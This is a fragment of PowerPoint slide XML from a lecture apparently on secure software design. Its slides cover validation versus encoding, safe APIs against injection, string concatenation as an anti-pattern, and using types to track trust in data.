              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t> queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, can prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks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C50C0-4E0D-7896-86F6-200E627D5C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6144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Validation vs  Sanitisation/Encoding/Escaping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702624" cy="4960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Validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sanitisation/encoding/escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are two very different operations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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  encoding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>makes more sense than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  sanitisation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>because encoding/sanitisation depends on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>context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Ideally, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>don't validate but parse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Ideally, use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ‘safe’ APIs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>that are immune to injection                               using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> types </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to enforce proper sanitisation  &amp; validation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98481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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2485E86A-1EBB-31E3-1038-0BBD3EC9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Anti-pattern:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US">
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>string concatenation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D264474B-6860-C2F1-EB28-3A7558FA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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Standard recipe for security disaster: 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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concatenate several pieces of data, some user input,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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pass the result to some API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="429402" indent="-414726">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string concatenation is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  of parsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55300" name="Tijdelijke aanduiding voor dianummer 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E40DAD68-B8AB-C728-9079-F68502350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0412051-E5FE-48F9-816F-4EE257E41D00}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL">
                <a:ea typeface="DejaVu Sans"/>
                <a:cs typeface="DejaVu Sans"/>
              </a:rPr>
              <a:pPr/>
              <a:t>107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55301" name="Afbeelding 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30C3323A-D159-E0CC-C7F9-FEEF68C10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9309"/>
            <a:ext cx="691200" cy="6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3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B0421A2E-6EF1-8E13-0443-C90149E1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Anti-pattern:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0">
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>strings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E2DDA-C071-C044-0A67-3D84AD84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1" y="1012681"/>
            <a:ext cx="7904160" cy="511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The use of strings in a warning sign</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="414726" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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not just  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>but also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" alt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char*, char[], StringBuilder, ...</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00990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1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strings are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, because you use them to represent many things:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>eg.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> username, file name, email address, URL, HTML, …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This also make strings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dangerous:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/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Strings are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unstructured data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> that still needs to be parsed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T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>he same string may be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>handled &amp; interpreted in many                              –  possibly unexpected – ways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rgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strings may or may not be validated or encoded, ... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="429402" indent="-414726"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</a:rPr>
              <a:t>A single string parameter in an API call often hides                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>an expressive &amp; powerful language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="429402" indent="-414726">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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56324" name="Tijdelijke aanduiding voor dianummer 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9322BB2-1695-5BB9-A899-31A9492DA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2CCB16C-62E9-4E1D-B072-C907640A9EFE}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL">
                <a:ea typeface="DejaVu Sans"/>
                <a:cs typeface="DejaVu Sans"/>
              </a:rPr>
              <a:pPr/>
              <a:t>108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56325" name="Afbeelding 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D2A313B-7F13-9898-6E50-A6E70DC4D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1" y="373321"/>
            <a:ext cx="691200" cy="6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B907-A909-E4D2-4416-60DB6D8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Use Types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D7BA-DB4B-CC3E-711B-12B2649B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Types can record &amp; ensure various aspects of data </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>origin of data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and hence the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>we have in it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special mention: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compile-time constants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>language/format it is intended for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validated or not, and how exactly?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encoded or not, and how exactly?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preventing ambiguity &amp; confusion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2E9C-75C5-B262-7FE3-383860842C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109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-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71D500-93BE-D7DB-ED8E-3C4CA2D902B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1983011" y="4365104"/>
            <a:ext cx="4610880" cy="1520640"/>
            <a:chOff x="1983011" y="4365104"/>
            <a:chExt cx="4610880" cy="1520640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Afgeronde rechthoek 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92659C0A-5B38-1CC4-28E3-C67F503B1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091" y="5221904"/>
              <a:ext cx="712800" cy="66384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2177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7" name="Right Arrow 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AB4EC66-E567-D7EF-02F7-972795CABA11}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5174051" y="5335664"/>
              <a:ext cx="627840" cy="23328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" name="Picture 2" descr="C:\Users\erikpoll\Desktop\.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34280169-B7D9-1670-AD34-6C18C478B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011" y="4457264"/>
              <a:ext cx="555840" cy="5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28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B549032A-F3EF-F8C4-12E2-4644F0889CAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2636771" y="4645904"/>
              <a:ext cx="918720" cy="230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0" name="Afgeronde rechthoek 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1D8D31-DE7B-5FFE-45A0-065E0A68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530" y="4434224"/>
              <a:ext cx="1491840" cy="1314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451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1" name="Afgeronde rechthoek 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{684CCA90-A96B-F462-7859-7302F4D8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571" y="4365104"/>
              <a:ext cx="724320" cy="62064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2177"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2" name="Right Arrow 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16ED7F9C-5C5A-03A1-4F8A-66D5EC322395}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5165411" y="4607024"/>
              <a:ext cx="627840" cy="2347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" name="Vrije vorm 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FC08C5D-10F9-0877-033B-47BE58CE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890" y="5162864"/>
              <a:ext cx="1474560" cy="345600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1626781"/>
                <a:gd name="T1" fmla="*/ 0 h 930267"/>
                <a:gd name="T2" fmla="*/ 557313 w 1626781"/>
                <a:gd name="T3" fmla="*/ 0 h 930267"/>
                <a:gd name="T4" fmla="*/ 629561 w 1626781"/>
                <a:gd name="T5" fmla="*/ 0 h 930267"/>
                <a:gd name="T6" fmla="*/ 897893 w 1626781"/>
                <a:gd name="T7" fmla="*/ 0 h 930267"/>
                <a:gd name="T8" fmla="*/ 1052705 w 1626781"/>
                <a:gd name="T9" fmla="*/ 0 h 930267"/>
                <a:gd name="T10" fmla="*/ 835971 w 1626781"/>
                <a:gd name="T11" fmla="*/ 0 h 930267"/>
                <a:gd name="T12" fmla="*/ 1093987 w 1626781"/>
                <a:gd name="T13" fmla="*/ 0 h 930267"/>
                <a:gd name="T14" fmla="*/ 1228153 w 1626781"/>
                <a:gd name="T15" fmla="*/ 0 h 930267"/>
                <a:gd name="T16" fmla="*/ 1579056 w 1626781"/>
                <a:gd name="T17" fmla="*/ 0 h 930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6781" h="930267">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="233030" y="54935"/>
                    <a:pt x="466060" y="109870"/>
                    <a:pt x="574158" y="223284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="682256" y="336698"/>
                    <a:pt x="590107" y="575931"/>
                    <a:pt x="648586" y="680484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="707065" y="785037"/>
                    <a:pt x="852376" y="903768"/>
                    <a:pt x="925032" y="850605"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="997688" y="797442"/>
                    <a:pt x="1095153" y="482009"/>
                    <a:pt x="1084521" y="361507"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1073889" y="241005"/>
                    <a:pt x="854149" y="178982"/>
                    <a:pt x="861237" y="127591"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="868325" y="76200"/>
                    <a:pt x="1059712" y="-72656"/>
                    <a:pt x="1127051" y="53163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1194391" y="178982"/>
                    <a:pt x="1181986" y="756683"/>
                    <a:pt x="1265274" y="882502"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1348562" y="1008321"/>
                    <a:pt x="1543493" y="850605"/>
                    <a:pt x="1626781" y="808075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177"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Vrije vorm 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1164329D-D72C-142B-DD87-8C78558AB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611" y="4581104"/>
              <a:ext cx="1470239" cy="1054080"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1643743"/>
                <a:gd name="T1" fmla="*/ 150846 h 1162427"/>
                <a:gd name="T2" fmla="*/ 241387 w 1643743"/>
                <a:gd name="T3" fmla="*/ 460 h 1162427"/>
                <a:gd name="T4" fmla="*/ 386220 w 1643743"/>
                <a:gd name="T5" fmla="*/ 193810 h 1162427"/>
                <a:gd name="T6" fmla="*/ 162936 w 1643743"/>
                <a:gd name="T7" fmla="*/ 559033 h 1162427"/>
                <a:gd name="T8" fmla="*/ 229319 w 1643743"/>
                <a:gd name="T9" fmla="*/ 956482 h 1162427"/>
                <a:gd name="T10" fmla="*/ 434501 w 1643743"/>
                <a:gd name="T11" fmla="*/ 1128354 h 1162427"/>
                <a:gd name="T12" fmla="*/ 621576 w 1643743"/>
                <a:gd name="T13" fmla="*/ 1074643 h 1162427"/>
                <a:gd name="T14" fmla="*/ 718129 w 1643743"/>
                <a:gd name="T15" fmla="*/ 526807 h 1162427"/>
                <a:gd name="T16" fmla="*/ 754336 w 1643743"/>
                <a:gd name="T17" fmla="*/ 150846 h 1162427"/>
                <a:gd name="T18" fmla="*/ 911241 w 1643743"/>
                <a:gd name="T19" fmla="*/ 140092 h 1162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3743" h="1162427">
                  <a:moveTo>
                    <a:pt x="0" y="152860"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="159657" y="73031"/>
                    <a:pt x="319314" y="-6797"/>
                    <a:pt x="435428" y="460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="551542" y="7717"/>
                    <a:pt x="720272" y="102060"/>
                    <a:pt x="696686" y="196403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="673100" y="290746"/>
                    <a:pt x="341086" y="437703"/>
                    <a:pt x="293914" y="566517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246743" y="695331"/>
                    <a:pt x="332014" y="873131"/>
                    <a:pt x="413657" y="969288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="495300" y="1065445"/>
                    <a:pt x="665843" y="1123503"/>
                    <a:pt x="783771" y="1143460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="901699" y="1163417"/>
                    <a:pt x="1035957" y="1190631"/>
                    <a:pt x="1121228" y="1089031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1206499" y="987431"/>
                    <a:pt x="1255486" y="689888"/>
                    <a:pt x="1295400" y="533860"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1335314" y="377832"/>
                    <a:pt x="1302657" y="218174"/>
                    <a:pt x="1360714" y="152860"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1418771" y="87546"/>
                    <a:pt x="1596572" y="151045"/>
                    <a:pt x="1643743" y="141974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177"/>
            </a:p>
          </p:txBody>
        </p:sp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EEF58EDC-F17B-DC8A-CE4C-20E88068B9FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2618050" y="5047664"/>
              <a:ext cx="918720" cy="2304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Vrije vorm 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A343C11F-8F09-793E-BA3F-D1034A2A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811" y="4675424"/>
              <a:ext cx="1512769" cy="1073331"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1589315"/>
                <a:gd name="T1" fmla="*/ 1037387 h 1230494"/>
                <a:gd name="T2" fmla="*/ 335490 w 1589315"/>
                <a:gd name="T3" fmla="*/ 786406 h 1230494"/>
                <a:gd name="T4" fmla="*/ 443705 w 1589315"/>
                <a:gd name="T5" fmla="*/ 79154 h 1230494"/>
                <a:gd name="T6" fmla="*/ 660149 w 1589315"/>
                <a:gd name="T7" fmla="*/ 79154 h 1230494"/>
                <a:gd name="T8" fmla="*/ 898237 w 1589315"/>
                <a:gd name="T9" fmla="*/ 44930 h 1230494"/>
                <a:gd name="T10" fmla="*/ 595228 w 1589315"/>
                <a:gd name="T11" fmla="*/ 775027 h 1230494"/>
                <a:gd name="T12" fmla="*/ 454535 w 1589315"/>
                <a:gd name="T13" fmla="*/ 1288350 h 1230494"/>
                <a:gd name="T14" fmla="*/ 1352771 w 1589315"/>
                <a:gd name="T15" fmla="*/ 638122 h 1230494"/>
                <a:gd name="T16" fmla="*/ 1406880 w 1589315"/>
                <a:gd name="T17" fmla="*/ 900494 h 1230494"/>
                <a:gd name="T18" fmla="*/ 1580033 w 1589315"/>
                <a:gd name="T19" fmla="*/ 1025978 h 1230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9315" h="1230494">
                  <a:moveTo>
                    <a:pt x="0" y="989933"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131536" y="946390"/>
                    <a:pt x="263072" y="902847"/>
                    <a:pt x="337458" y="750447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411844" y="598047"/>
                    <a:pt x="391887" y="188019"/>
                    <a:pt x="446315" y="75533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="500743" y="-36953"/>
                    <a:pt x="587829" y="80976"/>
                    <a:pt x="664029" y="75533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="740229" y="70090"/>
                    <a:pt x="914401" y="-67795"/>
                    <a:pt x="903515" y="42876"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="892629" y="153547"/>
                    <a:pt x="673101" y="541805"/>
                    <a:pt x="598715" y="739562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="524329" y="937319"/>
                    <a:pt x="330200" y="1251190"/>
                    <a:pt x="457200" y="1229419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584200" y="1207648"/>
                    <a:pt x="1201058" y="670619"/>
                    <a:pt x="1360715" y="608933"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1520372" y="547247"/>
                    <a:pt x="1377043" y="797618"/>
                    <a:pt x="1415143" y="859304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1453243" y="920990"/>
                    <a:pt x="1549401" y="960904"/>
                    <a:pt x="1589315" y="979047"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:cu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Right Arrow 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA2B5E46-E341-BED6-0FBD-72E2DD91FC6C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2587255" y="5426053"/>
              <a:ext cx="970892" cy="285781"/>
            </a:xfrm>
            <a:prstGeom prst="right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27" name="Afbeelding 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C95C5B1-28F4-5831-7067-76AFB166D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9" t="19199" r="18401" b="18401"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1986775" y="5271076"/>
              <a:ext cx="521280" cy="5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00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Recurring themes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>parsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
